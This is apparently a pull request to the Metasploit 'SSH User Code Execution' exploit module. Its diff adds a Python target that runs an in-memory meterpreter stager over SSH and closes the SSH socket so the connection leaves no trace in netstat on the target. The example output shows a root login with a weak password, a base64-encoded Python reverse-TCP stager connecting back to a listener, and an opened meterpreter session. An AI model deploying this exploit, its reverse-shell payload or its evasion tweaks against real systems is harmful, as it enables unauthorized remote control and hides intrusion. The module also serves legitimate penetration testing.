### PR TITLE
Update SSHExec User Code Execution

### DIFF
--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -17,9 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(
       'Name'             => 'SSH User Code Execution',
       'Description'      => %q{
-        This module utilizes a stager to upload an encoded
-        binary which is then decoded, chmod'ed and executed from
-        the command shell.
+        This module connects to the target system and executes the necessary
+        commands to run the specified payload via SSH. If a native payload is
+        specified an appropriate stager will be used.
       },
       'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
       'References'       =>

--- a/modules/exploits/multi/ssh/sshexec.rb
+++ b/modules/exploits/multi/ssh/sshexec.rb
@@ -15,56 +15,62 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize
     super(
-      'Name'        => 'SSH User Code Execution',
-      'Description' => %q{
-        This module utilizes a stager to upload a base64 encoded
+      'Name'             => 'SSH User Code Execution',
+      'Description'      => %q{
+        This module utilizes a stager to upload an encoded
         binary which is then decoded, chmod'ed and executed from
         the command shell.
       },
-      'Author'      => ['Spencer McIntyre', 'Brandon Knight'],
-      'References'  =>
+      'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
+      'References'       =>
         [
           [ 'CVE', '1999-0502'] # Weak password
         ],
-      'License'     => MSF_LICENSE,
-      'Privileged'  => true,
-      'DefaultOptions' =>
+      'License'          => MSF_LICENSE,
+      'Privileged'       => true,
+      'DefaultOptions'   =>
         {
-          'PrependFork' => 'true',
-          'EXITFUNC' => 'process'
+          'PrependFork'  => 'true',
+          'EXITFUNC'     => 'process'
         },
-      'Payload'     =>
+      'Payload'          =>
         {
-          'Space'    => 4096,
-          'BadChars' => "",
-          'DisableNops' => true
+          'Space'        => 4096,
+          'BadChars'     => "",
+          'DisableNops'  => true
         },
-      'Platform'    => %w{ linux osx },
-      'Targets'     =>
+      'Platform'         => %w{ linux osx python },
+      'Targets'          =>
         [
           [ 'Linux x86',
             {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
               'Platform' => 'linux'
             }
           ],
           [ 'Linux x64',
             {
-              'Arch' => ARCH_X86_64,
+              'Arch'     => ARCH_X86_64,
               'Platform' => 'linux'
             }
           ],
           [ 'OSX x86',
             {
-              'Arch' => ARCH_X86,
+              'Arch'     => ARCH_X86,
               'Platform' => 'osx'
+            }
+          ],
+          [ 'Python',
+            {
+              'Arch'     => ARCH_PYTHON,
+              'Platform' => 'python'
             }
           ]
         ],
-      'CmdStagerFlavor' => %w{ bourne echo printf },
-      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'  => %w{ bourne echo printf },
+      'DefaultTarget'    => 0,
       # For the CVE
-      'DisclosureDate' => 'Jan 01 1999'
+      'DisclosureDate'   => 'Jan 01 1999'
     )
 
     register_options(
@@ -128,6 +134,12 @@ class Metasploit3 < Msf::Exploit::Remote
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
 
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
-    execute_cmdstager({:linemax => 500})
+    if target['Platform'] == 'python'
+      execute_command("python -c \"#{payload.encoded}\"")
+    else
+      execute_cmdstager({:linemax => 500})
+    end
+
+    self.ssh_socket.close
   end
 end


### PR DESCRIPTION
This PR makes two primary improvements to the existing `exploit/multi/ssh/sshexec` module. The first is that the SSH session is closed after the module finishes running which means the SSH connection does not show up in netstat on the target (of course an established session will still show up though). And secondly, this PR adds a Python target so users can easily deploy a Python meterpreter and get a session without writing anything to disk.
- [x] Existing targets such as Linux continue to work with the pre-existing command stager logic
- [x] The new Python target opens a functioning session

Example output:

```
msf (S:0 J:0) exploit(sshexec) > show options 

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  toor             yes       The password to authenticate with.
   RHOST     192.168.90.128   yes       The target address
   RPORT     22               yes       The target port
   USERNAME  root             yes       The user to authenticate as.


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.90.1     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Python


msf (S:0 J:0) exploit(sshexec) > exploit

[*] [2015.08.12-16:06:28] Started reverse handler on 192.168.90.1:4444 
[*] [2015.08.12-16:06:28] 192.168.90.128:22 - Sending stager...
[*] [2015.08.12-16:06:28] Executing python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjkwLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))"
[*] [2015.08.12-16:06:28] Sending stage (36849 bytes) to 192.168.90.128
[*] Meterpreter session 3 opened (192.168.90.1:4444 -> 192.168.90.128:53732) at 2015-08-12 16:06:28 -0400

meterpreter > sysinfo
Computer     : kali
OS           : Linux 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 (2015-03-02)
Architecture : x86_64
Meterpreter  : python/python
```
